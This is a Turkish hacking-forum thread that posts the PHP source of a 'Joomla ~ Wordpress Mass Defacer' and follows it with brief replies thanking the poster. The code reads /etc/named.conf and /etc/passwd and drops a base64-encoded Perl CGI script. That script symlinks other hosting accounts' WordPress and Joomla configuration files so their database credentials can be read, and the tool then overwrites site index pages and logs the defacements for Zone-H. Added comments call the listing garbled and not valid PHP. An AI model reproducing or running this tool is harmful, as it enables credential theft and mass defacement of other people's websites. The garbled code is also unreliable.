$wr  "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
    
$fp = @fopen ('plsym/.htaccess','w');
    
fwrite($fp$wr);
    
fclose($fp);
    
$res file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');  
    
    
$url 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
    
unlink('plsym/plsym.cc');
    
    // The directory index of plsym/ is fetched and its links are enumerated.
$data file_get_contents($url);
    
preg_match_all('/<a href="(.+)">/'$data$match);
    unset(
$match[1][0]);
    
$i 1;
    foreach(
$match[1] as $m)    
    {
        
        // Entry names have the form <account>##<kind>.txt.
$mz explode('##',urldecode($m));
        
$config01 '';
        
$config02 '';
        if(
$mz[1] == 'joomla.txt') {
$config01 file_get_contents($url.$m);
        }
        if(
$mz[1] == 'wordpress.txt') {
$config02 file_get_contents($url.$m);
        }
        
$domain $map[$mz[0]];
        
$cls = ($j == 0) ? 'class="even"' 'class="odd"';
        
        if(
$config01 && preg_match('/dbprefix/i',$config01)){
echo 
'<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo 
'<td align="center"><font color="pink">JOOMLA</font></td>';
$res index_changer_joomla($config01$def$domain);
echo 
'<td>'.$res['output'].'</td>';
if(
$res['cond']) {
echo 
'<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output'http://'.$domain."<br>");
$count1++;
} else {
echo 
'<td align="center"><span class="red">FAILED</span></td>';
}
echo 
'</tr>';
        }

        if(
$config02 && preg_match('/DB_NAME/i',$config02)){
echo 
'<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo 
'<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res index_changer_wp($config02$def);
echo 
'<td>'.$res['output'].'</td>';
if(
$res['cond']) {
echo 
'<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output'http://'.$domain."<br>");
$count2++;
} else {
echo 
'<td align="center"><span class="red">FAILED</span></td>';
}
echo 
'</tr>';
        }
    }
    echo 
'</table>';
    echo 
'<hr/>';
    echo 
'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
    echo 
'<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
    if(
$count1+$count2 0){
        echo 
'<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
    }
}

/*
 * exec_mode_3 - driver for the "manual copy of /etc/passwd" mode.
 *
 * $def_url  URL whose contents are fetched and url-encoded as the
 *           replacement page
 *
 * The visible body mirrors exec_mode_2 with one difference: the request
 * field $_POST['man_data'] is written unmodified to plsym/data.txt before
 * the decoded script is dropped and run. The rest (plsym/ directory, .cc CGI
 * handler in .htaccess, directory-listing scrape for <account>##joomla.txt /
 * <account>##wordpress.txt, calls to the index_changer_* routines,
 * defaced.html log) is the same sequence.
 *
 * Defender notes (shared hosting):
 *   - Same preconditions as the other modes: user .htaccess may enable
 *     ExecCGI / FollowSymLinks / Indexes, and other accounts' config files
 *     are readable. Restricting AllowOverride and enforcing
 *     Options SymLinksIfOwnerMatch remove them.
 *   - Indicators visible here: `plsym/data.txt` in addition to the plsym/
 *     artefacts listed for the other passwd mode.
 *
 * NOTE(review): the listing appears to have lost operators and separators in
 * extraction and is not valid PHP as shown.
 */
function 
exec_mode_3($def_url) {
    
    
$domains = @file_get_contents("/etc/named.conf");
    @
preg_match_all('/.*?zone "(.*?)" {/'$domains$out);
    
$out array_unique($out[1]);
    
$num count($out);
    print(
"Total domains: $num<br><br />");
    
    
$def file_get_contents($def_url);
    
$def urlencode($def);
       
    
$output fopen('defaced.html''a+');
    
$defaced '';
    
$count1 0;
    
$count2 0;
    echo 
'<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
    
$j 1;
    
$map = array();
    foreach(
$out as $d) {
        
$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
        
$map[$info['name']] = $d;
    }
    
    // Embedded base64 blob; it starts with the encoding of a Perl shebang line and
    // is written to plsym/plsym.cc below. Contents not analysed here.
$dt 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcik​gPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
           kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgIC​BzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
           VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogI​CAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
           3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAg​ICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
           cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCc​pOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
           MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID​0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
           R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ=='
;
    
mkdir('plsym',0777);
    
    // Request data is written to disk as-is.
file_put_contents('plsym/data.txt'$_POST['man_data']);
    
file_put_contents('plsym/plsym.cc'base64_decode($dt));
    
chmod('plsym/plsym.cc'0755);
    
    // .htaccess turns on CGI execution for the .cc extension inside plsym/.
$wr  "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
    
$fp = @fopen ('plsym/.htaccess','w');
    
fwrite($fp$wr);
    
fclose($fp);
    
$res file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');  
    
    
$url 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
    
unlink('plsym/plsym.cc');
    
$data file_get_contents($url);
    
preg_match_all('/<a href="(.+)">/'$data$match);
    unset(
$match[1][0]);
    
$i=1;
    foreach(
$match[1] as $m)    
    {
        
        // Entry names have the form <account>##<kind>.txt.
$mz explode('##',urldecode($m));
        
$config01 '';
        
$config02 '';
        if(
$mz[1] == 'joomla.txt') {
$config01 file_get_contents($url.$m);
        }
        if(
$mz[1] == 'wordpress.txt') {
$config02 file_get_contents($url.$m);
        }
        
$domain $map[$mz[0]];
        
$cls = ($j == 0) ? 'class="even"' 'class="odd"';
        
        if(
$config01 && preg_match('/dbprefix/i',$config01)){
echo 
'<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo 
'<td align="center"><font color="pink">JOOMLA</font></td>';
$res index_changer_joomla($config01$def$domain);
echo 
'<td>'.$res['output'].'</td>';
if(
$res['cond']) {
echo 
'<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output'http://'.$domain."<br>");
$count1++;
} else {
echo 
'<td align="center"><span class="red">FAILED</span></td>';
}
echo 
'</tr>';
        }

        if(
$config02 && preg_match('/DB_NAME/i',$config02)){
echo 
'<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo 
'<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res index_changer_wp($config02$def);
echo 
'<td>'.$res['output'].'</td>';
if(
$res['cond']) {
echo 
'<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output'http://'.$domain."<br>");
$count2++;
} else {
echo 
'<td align="center"><span class="red">FAILED</span></td>';
}
echo 
'</tr>';
        }
    }
    echo 
'</table>';
    echo 
'<hr/>';
    echo 
'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
    echo 
'<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
    if(
$count1+$count2 0){
        echo 
'<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
    }
}
/*
 * Page output and request dispatch for the tool.
 *
 * Emits the HTML shell of the operator page (title, inline CSS, a small
 * script that shows or hides the manual-data textarea), then, when no action
 * parameter is present, a form offering the enumeration modes and an
 * "index url" field. On submission the `mode` value selects one of the
 * exec_mode_* drivers, which receive the posted `defpage` URL.
 *
 * Defender notes:
 *   - Static strings in this markup are convenient content signatures when
 *     sweeping web roots or response bodies for a dropped copy: the <title>
 *     text, the <h2> banner text, the form field names `defpage`,
 *     `man_data` and `form_action`, and the external image/font hosts it
 *     references.
 *   - The page reports whether /etc/named.conf and /etc/passwd are readable
 *     by the PHP process; on shared hosts /etc/named.conf should not be
 *     world-readable.
 *
 * NOTE(review): the listing appears to have lost operators and separators in
 * extraction and is not valid PHP as shown.
 */
echo 
'<!DOCTYPE html>
<html>
<head>
<title>Joomla ~ Wordpress Mass Defacer</title>
<link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css">
<style type="text/css">
table,body {
background: 
url("https://d33ds.co/img/bg3.png") repeat , 
url("https://d33ds.co/img/bglight.png") no-repeat center top,top left,top right, 
url("https://d33ds.co/img/bg2.png") repeat top left;
background-color: #ffffff;
color:white;
font-family: "Trebuchet MS",Arial;background-attachment:fixed;margin:0;padding:0;}
.header {position:fixed;width:100%;top:0;background:#000;}
.footer {position:fixed;width:100%;bottom:0;background:#000;}
input[type="submit"]{background-color:rgba(25,25,25,0.6);border:1; padding:2px; border-bottom:2px solid white; font-size:25px;font-family:orbitron; color:red;border:2px solid white;margin:4px 4px 8px 0;}
input[type="submit"]:hover{color:SeaShell;}
input[type="text"]:hover{color:SeaShell;}
input[type="radio"]{margin-top: 0;}
.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}
input[type="text"] {background:#111111; border:1; padding:2px; border-bottom:2px solid #393939;font-family:orbitron; font-size:25px; color:#ffffff;border:2px solid #4C83AF;margin:4px 4px 8px 0;}
.even {background-color: rgba(25, 25, 25, 0.6);}
.odd {background-color: rgba(102, 102, 102, 0.6);}
a {color:#fff;} a:hover {color:#00BFFF;}
fieldset{border: 1px solid grey; background: rgba(0,0,0,0.7); width: 600px; margin: 0 auto;min-height:240px;}
textarea{background: rgba(0,0,0,0.6); color: white;}
.green {color:#00FF00;font-weight:bold;}
.red {color:#FF0000;font-weight:bold;}
.killme {position: fixed; top: 20px; right: 20px; border: 2px solid yellow; padding: 10px; font-size: 20px; color: red; font-weight: bold;}
 </style>
<script type="text/javascript">
function change() {
if(document.getElementById(\'rcd\').checked == true) {
document.getElementById(\'tra\').style.display = \'\';
} else {
document.getElementById(\'tra\').style.display = \'none\';
}
        }
        function hide() {
document.getElementById(\'tra\').style.display = \'none\';
        }
    </script>
</head>
<body>
<div class="footer">
<h3 style="text-align: center;">&copy; K2ll33d&nbsp;&nbsp;<a href="http://facebook.com/k2ll33d" target="_blank"><img src="https://fbstatic-a.akamaihd.net/rsrc.php/yP/r/Ivn-CVe5TGK.ico" width=30></a></h3>
</div>
<h2 style="color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>'
;
// The form is shown only when none of the action parameters is present.
if(!isset(
$_POST['form_action']) && !isset($_GET['zh']) && !isset($_GET['mode']) && !isset($_GET['kill'])){
echo 
'<div align="center">
<form action="" method="post">
<table>
<tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('
.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
<tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('
.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
<tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of /etc/passwd</td></tr>
<tr id="tra" style="display: none;"><td></td><td><textarea cols="40" rows="5" name="man_data"></textarea></td></tr>
</table>
<br />
<input type="hidden" name="form_action" value="1">
<table>
<tr><td><b>index url: </b><input size="35" type="text" name="defpage" value=""></tr></td>
</table>
<input class=submit type="submit" value="Attack !" name="Submit">
</form>'
;
    }
// Dispatch on the posted (or query-string) mode value.
$milaf_el_index $_POST['defpage'];
    if(
$_POST['form_action'] == 1) {
if(
$_POST['mode']==1) { exec_mode_1($milaf_el_index$hacker); }
if(
$_POST['mode']==2) { exec_mode_2($milaf_el_index); }
if(
$_POST['mode']==3) { exec_mode_3($milaf_el_index); }
    }
    if(
$_GET['mode']==1) { exec_mode_1($milaf_el_index); }
    echo 
'</body>
</html>'

(Bu konu en son: 17.08.2014 Tarihinde, Saat: 21:36 düzenlenmiştir. Düzenleyen: H4CK4L.)

Dans ederken görülenler deli sanılır, Müziği duymayanlar tarafından.
#H4CK4L
Yorum: #2
Cvp: Joomla - Wp Mass Shell
17.08.2014 21:37
daha önce paylaşmıtım aynısımı bilmiyorum bakmak gerek Smile

Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.
Stallk3r
Yorum: #3
Cvp: Joomla - Wp Mass Shell
17.08.2014 22:31
görmedim abim Smile

Dans ederken görülenler deli sanılır, Müziği duymayanlar tarafından.
DeadLiner
Yorum: #4
Cvp: Joomla - Wp Mass Shell
18.08.2014 12:43
Eline sağlık yinede Exciting
Stallk3r
Yorum: #5
Cvp: Joomla - Wp Mass Shell
18.08.2014 17:03
Eyvallahh Smile

Dans ederken görülenler deli sanılır, Müziği duymayanlar tarafından.